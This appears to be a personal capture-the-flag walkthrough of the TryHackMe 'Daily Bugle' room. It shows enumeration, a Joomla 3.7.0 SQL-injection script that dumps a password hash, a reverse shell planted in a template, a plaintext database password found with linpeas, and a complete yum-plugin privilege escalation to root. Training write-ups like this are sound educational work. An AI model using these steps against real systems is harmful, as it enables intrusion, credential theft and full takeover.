# Tryhackme Daily Bungle
## **Goal: Get to Root!**
### **1. Gaining shell**
Start with the Room I start with simple nmap command, learning from my mistake and have to wait for full 65535 ports scan isn't smart.
```shell
┌──(kali㉿kali)-[~]
└─$ nmap -sN 10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:41 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
3306/tcp open|filtered mysql
```
After that I hit
```shell
┌──(kali㉿kali)-[~]
└─$ nmap -sV -A -p 22,80,3306 10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:42 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 (99%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.4 (96%), Linux 3.10 - 3.13 (95%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (94%), Linux 3.10 - 4.11 (94%), Linux 5.0 - 5.14 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 5 hops
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 110.89 ms 10.17.0.1 (10.17.0.1)
2 ... 4
5 260.96 ms 10.10.161.209 (10.10.161.209)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.68 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sN -p- -T4 --min-rate 8000 10.10.161.209
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 14:47 +07
Nmap scan report for 10.10.161.209 (10.10.161.209)
Host is up (0.27s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
3306/tcp open|filtered mysql
Nmap done: 1 IP address (1 host up) scanned in 10.50 seconds
```
With these I saved bunch of time waiting for ports.
I also ran this:
```shell
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.161.209 -w /usr/share/wordlists/dirb/common.txt -x .php -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.161.209
[+] Method: GET
[+] Threads: 40
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.php (Status: 403) [Size: 215]
/.htaccess (Status: 403) [Size: 211]
/.hta (Status: 403) [Size: 206]
/.htaccess.php (Status: 403) [Size: 215]
/.htpasswd (Status: 403) [Size: 211]
/.hta.php (Status: 403) [Size: 210]
/administrator (Status: 301) [Size: 243] [--> http://10.10.161.209/administrator/]
/bin (Status: 301) [Size: 233] [--> http://10.10.161.209/bin/]
/cache (Status: 301) [Size: 235] [--> http://10.10.161.209/cache/]
/cgi-bin/ (Status: 403) [Size: 210]
/components (Status: 301) [Size: 240] [--> http://10.10.161.209/components/]
/configuration.php (Status: 200) [Size: 0]
/images (Status: 301) [Size: 236] [--> http://10.10.161.209/images/]
/includes (Status: 301) [Size: 238] [--> http://10.10.161.209/includes/]
/index.php (Status: 200) [Size: 9280]
/index.php (Status: 200) [Size: 9280]
/language (Status: 301) [Size: 238] [--> http://10.10.161.209/language/]
/layouts (Status: 301) [Size: 237] [--> http://10.10.161.209/layouts/]
/libraries (Status: 301) [Size: 239] [--> http://10.10.161.209/libraries/]
/media (Status: 301) [Size: 235] [--> http://10.10.161.209/media/]
/modules (Status: 301) [Size: 237] [--> http://10.10.161.209/modules/]
/plugins (Status: 301) [Size: 237] [--> http://10.10.161.209/plugins/]
/robots.txt (Status: 200) [Size: 836]
/templates (Status: 301) [Size: 239] [--> http://10.10.161.209/templates/]
/tmp (Status: 301) [Size: 233] [--> http://10.10.161.209/tmp/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================
```
Some cool things right here!
Tryhackme also hint at:
```tips
Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
```
So I immediately visit each enumerate directories to see what's going on, only 2 are up!
```url
http://10.10.161.209/
```
And
```url
http://10.10.161.209/administrator/
```
I captured the 2 random login request to both of this site and toss it to SQLmap:
```shell
┌──(kali㉿kali)-[~]
└─$ sqlmap -r request-daily-bungle2.txt -p username,password --dbms=MariaDB --dump
...
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:56:01 /2025-05-31/
[14:56:01] [INFO] parsing HTTP request from 'request-daily-bungle2.txt'
[14:56:01] [WARNING] provided parameters 'username, password' are not inside the GET
[14:56:01] [WARNING] provided parameters 'username, password' are not inside the Cookie
[14:56:01] [INFO] testing connection to the target URL
got a 303 redirect to 'http://10.10.161.209/index.php/component/users/?view=login&Itemid=101'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[14:56:13] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:56:14] [INFO] testing if the target URL content is stable
[14:56:16] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[14:56:17] [INFO] testing for SQL injection on POST parameter 'username'
[14:56:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:56:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:56:22] [INFO] testing 'Generic inline queries'
[14:56:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:56:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:56:26] [WARNING] time-based comparison requires larger statistical model, please wait................ (done)
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[14:56:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:57:02] [WARNING] POST parameter 'username' does not seem to be injectable
[14:57:03] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[14:57:03] [INFO] testing for SQL injection on POST parameter 'password'
[14:57:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:57:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:57:08] [INFO] testing 'Generic inline queries'
[14:57:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:57:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:57:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:57:23] [WARNING] POST parameter 'password' does not seem to be injectable
[14:57:23] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 14:57:23 /2025-05-31/
```
Doesn't seem so promising.
Ok so, let's check if Tryhackme left us any hints?
```hints
What is the Joomla version?
```
I immediately open:
```url
view-source:http://10.10.161.209/administrator/
```
Scrolling around I saw this:
```html
The Daily Bugle - Administration
```
Notice these 2:
```url
...
...
```
I tried visit:
```url
http://10.10.161.209/administrator/templates/isis/images/
```
And it's ACCESSIBLE!
I then jump to gobuster!
```shell
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.161.209/administrator/ -w /usr/share/wordlists/dirb/common.txt -x .php -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.161.209/administrator/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd.php (Status: 403) [Size: 229]
/.htaccess.php (Status: 403) [Size: 229]
/.htpasswd (Status: 403) [Size: 225]
/.hta (Status: 403) [Size: 220]
/.hta.php (Status: 403) [Size: 224]
/.htaccess (Status: 403) [Size: 225]
/cache (Status: 301) [Size: 249] [--> http://10.10.161.209/administrator/cache/]
/components (Status: 301) [Size: 254] [--> http://10.10.161.209/administrator/components/]
/help (Status: 301) [Size: 248] [--> http://10.10.161.209/administrator/help/]
/includes (Status: 301) [Size: 252] [--> http://10.10.161.209/administrator/includes/]
/index.php (Status: 200) [Size: 4846]
/index.php (Status: 200) [Size: 4846]
/language (Status: 301) [Size: 252] [--> http://10.10.161.209/administrator/language/]
/logs (Status: 301) [Size: 248] [--> http://10.10.161.209/administrator/logs/]
/modules (Status: 301) [Size: 251] [--> http://10.10.161.209/administrator/modules/]
/templates (Status: 301) [Size: 253] [--> http://10.10.161.209/administrator/templates/]
Progress: 9228 / 9230 (99.98%)
===============================================================
Finished
===============================================================
```
Looks familiar?
Go back to our nmap result, you can see:
```shell
┌──(kali㉿kali)-[~]
└─$ nmap -sV -A -p 22,80,3306 10.10.161.209
...
...
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
```
We should check and visit each directory!
I did just that and I found:
#### **First URL:**
```url
http://10.10.161.209/administrator/modules/mod_stats_admin/mod_stats_admin.xml
```
Show:
```html
mod_stats_adminJoomla! ProjectJuly 2004
Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.
GNU General Public License version 2 or later; see LICENSE.txt
admin@joomla.orgwww.joomla.org3.0.0MOD_STATS_XML_DESCRIPTION
```
#### **Second URL:**
```url
http://10.10.161.209/administrator/components/com_admin/admin.xml
```
Show:
```html
com_adminJoomla! ProjectApril 2006
(C) 2005 - 2017 Open Source Matters. All rights reserved.
GNU General Public License version 2 or later; see LICENSE.txt
admin@joomla.orgwww.joomla.org3.0.0COM_ADMIN_XML_DESCRIPTIONadmin.phpcontroller.phphelpersmodelsviewslanguage/en-GB.com_admin.inilanguage/en-GB.com_admin.sys.ini
```
#### **Third URL:**
```url
http://10.10.161.209/administrator/language/en-GB/en-GB.xml
```
Show:
```html
English (en-GB)3.7.0April 2017Joomla! Projectadmin@joomla.orgwww.joomla.org
Copyright (C) 2005 - 2017 Open Source Matters. All rights reserved.
GNU General Public License version 2 or later; see LICENSE.txt
en-GB administrator languageEnglish (en-GB)English (United Kingdom)en-GB0
en_GB.utf8, en_GB.UTF-8, en_GB, eng_GB, en, english, english-uk, uk, gbr, britain, england, great britain, uk, united kingdom, united-kingdom
00,6gregorian
```
### ***THE CORRECT ANSWER IS 3.7.0***
Why?
According to a friend:
#### Why the **language-pack XML** gives the right Joomla version while the others don’t
| Manifest you looked at | What its `` actually means | Why it’s **not** the core CMS version |
| --------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------- |
| `administrator/modules/mod_stats_admin/mod_stats_admin.xml``administrator/components/com_admin/admin.xml` | Version of **that single module / component** (both happen to be *3.0.0* because they were created when Joomla 3 was first released). | Each extension keeps its **own** changelog. They don’t bump every time the CMS does. |
| `administrator/language/en-GB/en-GB.xml` | Version of the **entire language pack build** that ships with *each* Joomla release. | Joomla ships a **new language pack for every point release**, so its number always mirrors the **core** version (here *3.7.0*). |
**How the numbering works**
1. **Extension manifests** (` … X.Y.Z`)\
\&#xNAN;*X.Y.Z* is just the maintainer’s semantic-version for that **plugin / module / component**.\
It will stay at 3.0.0 until that specific extension changes.
2. **Schema attribute** (``)\
The `version="3.1"` up top is **the manifest-schema version**, not Joomla’s release.
3. **Language-pack manifest** (` … 3.7.0`)\
The language files are rebuilt and re-tagged **every time Joomla is tagged**.\
So if the site is updated to 3.7.5 you’d see `3.7.5` there.
Because every Joomla installation **must** have at least one language pack—and that pack’s\
version is bumped **in lock-step with the core**—grabbing the value from\
`administrator/language//.xml` is the most reliable passive way to fingerprint the running Joomla version.
That’s why TryHackMe expected **3.7.0**: it’s the number that reflects the core build, not the frozen extension numbers you saw first.
***
Cool, Back to gaining foot hold, from searching I found this:
```url
https://github.com/XiphosResearch/exploits/blob/master/Joomblah/joomblah.py
```
Very convenient?
So let's run it!
```shell
┌──(kali㉿kali)-[~/Downloads]
└─$ python2 joomblah.py http://10.10.161.209/
...
...
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
- Extracting sessions from fb9j5_session
```
There we got: `$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm`
Decrypt it with `https://hashes.com/en/decrypt/hash` we got the password!
Now if we login to the:
```url
http://10.10.161.209
```
We don't see much.
But if we use login to:
```url
http://10.10.161.209/administrator/
```
We got our nice admin panel!
Now, I tried metasploit using CVE-2017-8917 `https://www.exploit-db.com/exploits/44358`
```shell
┌──(kali㉿kali)-[~/Downloads]
└─$ msfconsole
...
...
msf6 > use exploit/unix/webapp/joomla_comfields_sqli_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > options
...
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set RHOSTS 10.10.161.209
RHOSTS => 10.10.161.209
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set LHOST [YOUR IP]
LHOST => [YOUR IP]
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > run
[*] Started reverse TCP handler on [YOUR IP]:4444
[-] Exploit aborted due to failure: unknown: 10.10.161.209:80 - Error retrieving table prefix
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > check
[*] 10.10.161.209:80 - The target is not exploitable.
...
```
Seems like we need another entry point.
No worries, we are now web admin, let's execute the shell ourselves!
Now if you go to:
Choose template:
```url
http://10.10.161.209/administrator/index.php?option=com_templates&view=templates
```
Choose Beez3:
```url
http://10.10.161.209/administrator/index.php?option=com_templates&view=template&id=503&file=aG9tZQ==
```
And choose: Editor -> html -> modules.php
Set up our netcat:
```shell
nc -lvnp 4444
```
Edit it, paste our reverse shell, press save and preview.
```shell
┌──(kali㉿kali)-[~/Downloads]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [[YOUR IP]] from (UNKNOWN) [10.10.161.209] 42262
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
05:21:30 up 1:52, 0 users, load average: 0.01, 0.04, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$c cd /tmp
```
We got our Reverse shell!
### **2. Privilege Escalation**
Let's set up our python server and upload linpeas.sh
```shell
python3 -m http.server 80
```
Then:
```shell
bash-4.2$ wget http://[YOUR IP]:80/linpeas.sh
wget http://[YOUR IP]:80/linpeas.sh
--2025-05-31 05:30:36-- http://[YOUR IP]/linpeas.sh
Connecting to [YOUR IP]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 839046 (819K) [text/x-sh]
Saving to: 'linpeas.sh'
100%[======================================>] 839,046 253KB/s in 3.2s
2025-05-31 05:30:40 (253 KB/s) - 'linpeas.sh' saved [839046/839046]
bash-4.2$ chmod 777 linpeas.sh
chmod 777 linpeas.sh
bash-4.2$ ./linpeas.sh
```
Earlier, we can see that, Tryhackme hint at the fact that we might need to privilege escalate from yum, we might try sudo -l to check if we have right to run password-less yum:
```shell
bash-4.2$ sudo -n -l
sudo -n -l
sudo: a password is required
```
This means we need credential of another user to login, luckily, if we go back to our linpeas.sh results:
```shell
╔══════════╣ Searching passwords in config PHP files
/var/www/html/configuration.php: public $password = 'nv5uz9r3ZEDzVjNu';
/var/www/html/libraries/joomla/log/logger/database.php: $this->password = (empty($this->options['db_pass'])) ? '' : $this->options['db_pass'];
/var/www/html/libraries/joomla/log/logger/database.php: $this->password = null;
/var/www/html/libraries/joomla/log/logger/database.php: 'password' => $this->password,
```
Let's try it!:
```shell
bash-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu
[jjameson@dailybugle tmp]$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
```
Great, so our user `jjameson` has privilege to run `sudo yum` with out password.
The privilege from yum below can be found here:
```url
https://gtfobins.github.io/gtfobins/yum/
```
Escalate from `jjameson` to `root`:
```shell
[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
TF=$(mktemp -d)
[jjameson@dailybugle tmp]$ cat >$TF/x<$TF/x< [main]
[main]
> plugins=1
plugins=1
> pluginpath=$TF
pluginpath=$TF
> pluginconfpath=$TF
pluginconfpath=$TF
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.conf<$TF/y.conf< [main]
[main]
> enabled=1
enabled=1
> EOF
EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.py<$TF/y.py< import os
import os
> import yum
import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
requires_api_version='2.1'
> def init_hook(conduit):
def init_hook(conduit):
> os.execl('/bin/sh','/bin/sh')
os.execl('/bin/sh','/bin/sh')
> EOF
EOF
[jjameson@dailybugle tmp]$ sudo yum -c $TF/x --enableplugin=y
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
whoami
root
sh-4.2# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
[root@dailybugle tmp.xUQmxLM2mw]# cat /root/root.txt
cat /root/root.txt
#flaghidden
[root@dailybugle tmp.xUQmxLM2mw]# cat /home/jjameson/user.txt
cat /home/jjameson/user.txt
#flaghidden
```
